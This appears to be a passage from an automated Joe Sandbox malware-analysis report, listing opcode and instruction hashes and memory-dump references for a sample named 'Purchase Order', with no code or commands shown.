                                            • Instruction Fuzzy Hash: A8E0DF32A143898BE311C614D5C2B027BACF750688F204426E704CE883E629E552C950
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2862d5c95079e8f9bdfc17701203be164f113e2c7109adcb0461f4fb661a1a8a
                                            • Instruction ID: 4309bfd793feb278894006d00728c9debc69bbd4e5df9ae0b67df39f5ffdabf3
                                            • Opcode Fuzzy Hash: 2862d5c95079e8f9bdfc17701203be164f113e2c7109adcb0461f4fb661a1a8a
                                            • Instruction Fuzzy Hash: 45E0CD31245214FFE7125A48CC00F557755DB407D0F104131FB085A650C5B59C51D6D4
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: fa71a7a20b7e210d988e4711d2619833c9c2d92d4ef42c1efdc675344f9c19f1
                                            • Instruction ID: c9741bbee980bd7bc573cc46748fabb6f1266f3e7e864b55ac86c54f5a73465c
                                            • Opcode Fuzzy Hash: fa71a7a20b7e210d988e4711d2619833c9c2d92d4ef42c1efdc675344f9c19f1
                                            • Instruction Fuzzy Hash: 7AF03278249B80CFF21ACF08C1A1B113BB9FB49B00F800998C4468BBA1C77AE942CE40
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4c31a3856b4da07fe7e5e361be72a8d0057798c6b12cf0760c9cf0ecce6d8038
                                            • Instruction ID: 9ce93f63819ab086d5435365e836d15410f8e17527b111ebfffeea39f4527c78
                                            • Opcode Fuzzy Hash: 4c31a3856b4da07fe7e5e361be72a8d0057798c6b12cf0760c9cf0ecce6d8038
                                            • Instruction Fuzzy Hash: D4E05BB8706000CFEB068F18C551B553BA6EBC9B48F5442ACE042EB574C734DC96DF44
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9a5e2bd081124a3f13a719424f52f915b273ab11891c862475698e01fbf38d6a
                                            • Instruction ID: 9dc9dd81b2945797a28f59a43e01e52fa8225a114225ccb3519e5c8d5a5b4da8
                                            • Opcode Fuzzy Hash: 9a5e2bd081124a3f13a719424f52f915b273ab11891c862475698e01fbf38d6a
                                            • Instruction Fuzzy Hash: 54D05E36801924DFEB628B08CA50F4A7BB9EBC0B90F950298A820B3631C7389C12CA40
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ace296e609ac8b67c5343de034456dc839b887b76dabe9a56c9e42ba91ce2c8e
                                            • Instruction ID: 768f8f46ad12ba4fd686936a131e145bce6c33d91c21231770546d7aaa62dd10
                                            • Opcode Fuzzy Hash: ace296e609ac8b67c5343de034456dc839b887b76dabe9a56c9e42ba91ce2c8e
                                            • Instruction Fuzzy Hash: 3CD0177AC02664CFE7628A98CA01B5A76B9EB85A60F9602589400A3A90C3B9DC55C684
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 73b68ca8792e09d39eb84bf204166a27678a7482029cab1375adc9e7cd32c121
                                            • Instruction ID: 166d344bf21afee24a3931181f65ddca1d17bfc35c0906d9d9b41d135be23e13
                                            • Opcode Fuzzy Hash: 73b68ca8792e09d39eb84bf204166a27678a7482029cab1375adc9e7cd32c121
                                            • Instruction Fuzzy Hash: 36D01779945AC48FE317CB08C161B407BF4F705B40F851498E0424BAA2C2BC9985CB00
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 768b791705985fef6bbd48d24f8a2b4910ff65960d9034aae90c2b5012bdc449
                                            • Instruction ID: 5175c3274ecb8f530fcc76e939db2d49d12973d9a905144c96c59c968706f25e
                                            • Opcode Fuzzy Hash: 768b791705985fef6bbd48d24f8a2b4910ff65960d9034aae90c2b5012bdc449
                                            • Instruction Fuzzy Hash: 10C08C74282A409EEB631B24CD01B0036A1BB00F85F8004A06701D90F0DBB8D900EA40
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 228d46562787cc6ef91b6aff40b17c30ce715ed8b58bcfbb69b93c396a4a2043
                                            • Instruction ID: ccacae6fec8b1b5babc57a9d87f1a132f6c978196b55e831da4989916c0d7e23
                                            • Opcode Fuzzy Hash: 228d46562787cc6ef91b6aff40b17c30ce715ed8b58bcfbb69b93c396a4a2043
                                            • Instruction Fuzzy Hash: 66C08CB8242588AEFB0B4740C900B283650AB10BE6FC4039CAA40395A1C3AC98138218
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ccd2a26de72ad56863b464ee513e1bdf5b538be61a0d483438a80ca9d306cdef
                                            • Instruction ID: fdad86066b0be9cbae95232b981efc1978bcb8f60437d0988f9ec26b67c4dac3
                                            • Opcode Fuzzy Hash: ccd2a26de72ad56863b464ee513e1bdf5b538be61a0d483438a80ca9d306cdef
                                            • Instruction Fuzzy Hash: FC90027120140406D1407158441474654054FD0305F55C522A5065514E8659CEDD6666
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d1534e93db0b5a30111db028c117c19bdebc3a2023da8e7fe48d0dd9099b0168
                                            • Instruction ID: 8b300d94141e5d5d5be2f812b316ebf984c0aba1a3c6002e221cfe6f9ae323b8
                                            • Opcode Fuzzy Hash: d1534e93db0b5a30111db028c117c19bdebc3a2023da8e7fe48d0dd9099b0168
                                            • Instruction Fuzzy Hash: 4A90026120180407D1407558481460754054FD0306F55C522A2065515E8A29CD996136
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: cef7d208b67db85fafcc445e6c4527c83d3ffbe8cc2216ed2b1e9ce35d462670
                                            • Instruction ID: 0fb2fb9fccf460b0445048100ec7bb8563d90fa3013e8c1e7fb0cd254015049a
                                            • Opcode Fuzzy Hash: cef7d208b67db85fafcc445e6c4527c83d3ffbe8cc2216ed2b1e9ce35d462670
                                            • Instruction Fuzzy Hash: A890022130140406D1027158442460654098FD1349F95C523E1425515D8625CA9BA133
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 73d85421b112126aad5008ba46b9a867348a2271031c2da276990f9762f77f8b
                                            • Instruction ID: ad1601e6ec07995d81456a68dfe3a2e5efd24cfe84fad31aac39d040c358bb42
                                            • Opcode Fuzzy Hash: 73d85421b112126aad5008ba46b9a867348a2271031c2da276990f9762f77f8b
                                            • Instruction Fuzzy Hash: 5890023120180406D1007158482470B54054FD0306F55C522A1165515D8625C9996572
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c897043d729d383fce1df6b7d7be7a20b2baa58b4b650a5ca5a668a5928b23f5
                                            • Instruction ID: d6ea1967ae4ed88695d5f8017a93229db6870131ec841260d2f8e9b8d9a7e41c
                                            • Opcode Fuzzy Hash: c897043d729d383fce1df6b7d7be7a20b2baa58b4b650a5ca5a668a5928b23f5
                                            • Instruction Fuzzy Hash: 0E90023120180406D1007158481874754054FD0306F55C522A5165515E8665C9D96532
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2425ecd43fa3ab87e163baf74cf31b46581ee977127b4b032c4f281e3c17018e
                                            • Instruction ID: 0e98705f35218c90d4d538f1f31f52730cb687d2b4e18890928a4240c9a24be2
                                            • Opcode Fuzzy Hash: 2425ecd43fa3ab87e163baf74cf31b46581ee977127b4b032c4f281e3c17018e
                                            • Instruction Fuzzy Hash: 4D9002216014004641407168885490694056FE1215755C632A0999510D8559C9AD5666
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8cc547dac1a2ec4805ea7504bc64fc52f767f737b3a2668a602eddb22d909c1d
                                            • Instruction ID: 0157087be7d1331c7a02f2b81f89b2becf37ee5c7d3a28f6a6918e867a3ad777
                                            • Opcode Fuzzy Hash: 8cc547dac1a2ec4805ea7504bc64fc52f767f737b3a2668a602eddb22d909c1d
                                            • Instruction Fuzzy Hash: B1900221211C0046D20075684C24B0754054FD0307F55C626A0155514CC915C9A95522
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 13a9e61c44c8921f6a09b471d4750c6487253e18fbb51fb689bea68fc3756323
                                            • Instruction ID: ea9c00773a67097bd48c791ff85a082380a79e6af4e1c6ba91e42c4d54879ea6
                                            • Opcode Fuzzy Hash: 13a9e61c44c8921f6a09b471d4750c6487253e18fbb51fb689bea68fc3756323
                                            • Instruction Fuzzy Hash: 2090026134140446D10071584424B0654058FE1305F55C526E1065514D8619CD9A6127
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5c1a9b6d85c7b366df0ccafe71c21500d4a392c85cec9fac13af3fb78c654caf
                                            • Instruction ID: 24b2a6942ae840a71c7ac9ab895e706540774218e82fe60813d87ee510701371
                                            • Opcode Fuzzy Hash: 5c1a9b6d85c7b366df0ccafe71c21500d4a392c85cec9fac13af3fb78c654caf
                                            • Instruction Fuzzy Hash: 9890047131140047D104715C441470754454FF1305F55C533F3155514CC53DCDFD5137
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0e5dd18a06bb968ef2bc00943cda82119a79398464ac06c734867a14711a2a9c
                                            • Instruction ID: 75c6ad6477c69f647f59f6176f351e75f6bd658bf7e1588f5e01ae6e9c86661e
                                            • Opcode Fuzzy Hash: 0e5dd18a06bb968ef2bc00943cda82119a79398464ac06c734867a14711a2a9c
                                            • Instruction Fuzzy Hash: 609002A1201540964500B2588414B0A99054FE0205B55C527E1055520CC525C9999136
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c17de95a5edcb2e62540d85c02db1e072c015fee1da0ee62e65e0e20a7072ddd
                                            • Instruction ID: 5ceca7f517ea7c48c25ec35030cbe0f21132b3637b912beb65bf82efffabd210
                                            • Opcode Fuzzy Hash: c17de95a5edcb2e62540d85c02db1e072c015fee1da0ee62e65e0e20a7072ddd
                                            • Instruction Fuzzy Hash: 67900435311400070105F55C071450754474FD5355355C533F1017510CD731CDFD5133
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ffc6e535e17ccbb3c5010ef817fd0d2abb04befa7d5d0d09a2d3f352f0594fd6
                                            • Instruction ID: 9ad96cd38d2833b8b28f3f956f6950a0672e0e9eb37ea8737445984cd6952b7d
                                            • Opcode Fuzzy Hash: ffc6e535e17ccbb3c5010ef817fd0d2abb04befa7d5d0d09a2d3f352f0594fd6
                                            • Instruction Fuzzy Hash: 8E900225221400060145B558061450B58455FD6355395C526F1417550CC621C9AD5322
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3a8c96d0d2ec20c6afedb483eb4c8c77c6c667d2137e0e9d40979eec0387f655
                                            • Instruction ID: 6f6eb152c6ba49c125271cf2c7a4c2144521ec76dbddbe47c486a0f5f6d0e091
                                            • Opcode Fuzzy Hash: 3a8c96d0d2ec20c6afedb483eb4c8c77c6c667d2137e0e9d40979eec0387f655
                                            • Instruction Fuzzy Hash: C790023120140806D1047158481468654054FD0305F55C522A6025615E9665C9D97132
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7d78de77af51aee09d6c0cec674ccdd85bace3757e73f3582417216b723783ff
                                            • Instruction ID: 21cc67da996bef3d1729d8222ec6340f9128ef48f5c4b835820dc77076ede2ae
                                            • Opcode Fuzzy Hash: 7d78de77af51aee09d6c0cec674ccdd85bace3757e73f3582417216b723783ff
                                            • Instruction Fuzzy Hash: 8C90023160540806D1507158442474654054FD0305F55C522A0025614D8755CB9D76A2
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9bc7c3395a79c2621407fed89e9aa3a6435ac5a8c8122a52ebcc76555656afc3
                                            • Instruction ID: e72dcf6370ff5aa395e80c9f487c0d8fbaf1c23ac248866581572aee086f4aaa
                                            • Opcode Fuzzy Hash: 9bc7c3395a79c2621407fed89e9aa3a6435ac5a8c8122a52ebcc76555656afc3
                                            • Instruction Fuzzy Hash: 6490023120544846D14071584414A4654154FD0309F55C522A0065654D9625CE9DB662
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f5b2f54ffd9dfded419d71a7499c177df7bb0fbd06b10c8fc2bc024d7c31095f
                                            • Instruction ID: c3d15e14230de5a9c1304e7b7a3075f1ad24be2abb22159ceafc8e33d6c0c6b1
                                            • Opcode Fuzzy Hash: f5b2f54ffd9dfded419d71a7499c177df7bb0fbd06b10c8fc2bc024d7c31095f
                                            • Instruction Fuzzy Hash: B690023120140806D1807158441464A54054FD1305F95C526A0026614DCA15CB9D77A2
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c302c58efd76b85a4ce481e756adcff9e2826d97265cee25fad13d595f16b223
                                            • Instruction ID: c3d9aa221953d091c38835bc86f040f9f4a3f11c5d8827b9111ea5b8d25530b9
                                            • Opcode Fuzzy Hash: c302c58efd76b85a4ce481e756adcff9e2826d97265cee25fad13d595f16b223
                                            • Instruction Fuzzy Hash:

                                            Control-flow Graph (first block 34862890-348628b3; legend: Executed / Not Executed)
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmp
